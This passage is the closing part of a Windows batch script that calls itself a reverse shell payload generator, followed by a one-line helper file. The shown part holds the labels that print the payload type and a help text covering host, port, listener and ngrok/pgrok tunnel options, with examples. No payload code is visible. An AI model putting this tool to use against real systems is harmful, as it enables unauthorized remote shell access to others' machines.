:rs_info_w7windows_end 794 | 795 | :rs_info_w10linux_start 796 | echo  Linux Payload 797 | echo, 798 | goto :eof 799 | :rs_info_w10linux_end 800 | 801 | :rs_info_w7linux_start 802 | powershell -c write-host "' Linux Payload'" -f yellow 2>nul 803 | echo, 804 | goto :eof 805 | :rs_info_w7linux_end 806 | 807 | :rs_info_wlinux10_start 808 | echo  Windows^&Linux Payload 809 | echo, 810 | goto :eof 811 | :rs_info_wlinux10_end 812 | 813 | :rs_info_wlinux7_start 814 | powershell -c write-host "' Windows&Linux Payload'" -f yellow 2>nul 815 | echo, 816 | goto :eof 817 | :rs_info_wlinux7_end 818 | 819 | ::help info 820 | :rs_help_start 821 | echo, 822 | echo This is a Reverse Shell Payload Generator. 823 | echo, 824 | echo Usage: %~nx0 host port [options] 825 | echo Options: 826 | echo -pub If the target can access the public network, use it. 827 | echo -lan If the target cannot access the Internet, use it. 828 | echo -listen If you need to listen the port, use it. 829 | echo -ngrok Start ngrok TCP Tunnel(Contains -pub, -listen options). 830 | echo -pgrok Start pgrok TCP Tunnel(like ngrok but free and unlimited). 831 | echo, 832 | echo Examples: %~nx0 8.8.8.8 8888 833 | echo %~nx0 8.8.8.8 8888 -pub 834 | echo %~nx0 192.168.31.216 8888 -lan 835 | echo %~nx0 192.168.31.216 8888 -listen 836 | echo %~nx0 192.168.31.216 8888 -lan -listen 837 | echo %~nx0 8888 -ngrok 838 | echo %~nx0 8888 -pgrok 839 | exit /b 0 840 | :rs_help_end -------------------------------------------------------------------------------- /runcmd.bat: -------------------------------------------------------------------------------- 1 | @cmd /k cd %cd%\ --------------------------------------------------------------------------------